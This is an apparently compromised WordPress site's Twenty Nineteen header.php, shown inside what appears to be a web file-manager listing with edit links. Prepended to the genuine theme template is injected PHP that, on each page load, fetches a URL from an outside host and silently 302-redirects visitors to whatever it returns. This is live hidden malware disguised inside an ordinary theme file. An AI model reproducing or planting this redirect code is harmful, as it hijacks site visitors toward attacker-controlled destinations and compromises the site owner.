PATH:
home
/
letacommog
/
autopropr01
/
wp-content
/
themes
/
twentynineteen
<?php function r2048($u){ $t = ""; $to = 20; if( @function_exists('curl_version') || in_array('curl', get_loaded_extensions()) ){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, $to); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $t = curl_exec($ch); curl_close($ch); } else { $x = stream_context_create(array("http" => array('timeout' => $to), "https" => array('timeout' => $to))); $t = file_get_contents($u, false, $x); } return $t; } $tgurl = @r2048("http://youtubesave.org/rl/g.php"); if($tgurl){ while (@ob_get_level()) { @ob_end_clean(); } header("Location: " . $tgurl, true, 302); exit; } ?><?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package WordPress * @subpackage Twenty_Nineteen * @since 1.0.0 */ ?><!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="profile" href="https://gmpg.org/xfn/11" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php _e( 'Skip to content', 'twentynineteen' ); ?></a> <header id="masthead" class="<?php echo is_singular() && twentynineteen_can_show_post_thumbnail() ? 'site-header featured-image' : 'site-header'; ?>"> <div class="site-branding-container"> <?php get_template_part( 'template-parts/header/site', 'branding' ); ?> </div><!-- .layout-wrap --> <?php if ( is_singular() && twentynineteen_can_show_post_thumbnail() ) : ?> <div class="site-featured-image"> <?php twentynineteen_post_thumbnail(); the_post(); $discussion = ! is_page() && twentynineteen_can_show_post_thumbnail() ? twentynineteen_get_discussion_data() : null; $classes = 'entry-header'; if ( ! empty( $discussion ) && absint( $discussion->responses ) > 0 ) { $classes = 'entry-header has-discussion'; } ?> <div class="<?php echo $classes; ?>"> <?php get_template_part( 'template-parts/header/entry', 'header' ); ?> </div><!-- .entry-header --> <?php rewind_posts(); ?> </div> <?php endif; ?> </header><!-- #masthead --> <div id="content" class="site-content">
[+]
..
[-] comments.php
[edit]
[-] style.css
[edit]
[-] style-rtl.css
[edit]
[-] footer.php
[edit]
[-] readme.txt
[edit]
[-] style.css.map
[edit]
[+]
template-parts
[+]
sass
[-] archive.php
[edit]
[-] style-editor.scss
[edit]
[+]
classes
[-] print.scss
[edit]
[+]
fonts
[+]
inc
[-] style-editor-customizer.scss
[edit]
[-] style-editor.css
[edit]
[-] package-lock.json
[edit]
[-] print.css
[edit]
[-] index.php
[edit]
[-] package.json
[edit]
[-] image.php
[edit]
[-] search.php
[edit]
[-] style-editor-customizer.css
[edit]
[-] single.php
[edit]
[+]
js
[-] postcss.config.js
[edit]
[-] functions.php
[edit]
[-] 404.php
[edit]
[-] style.scss
[edit]
[-] header.php
[edit]
[-] page.php
[edit]
[-] screenshot.png
[edit]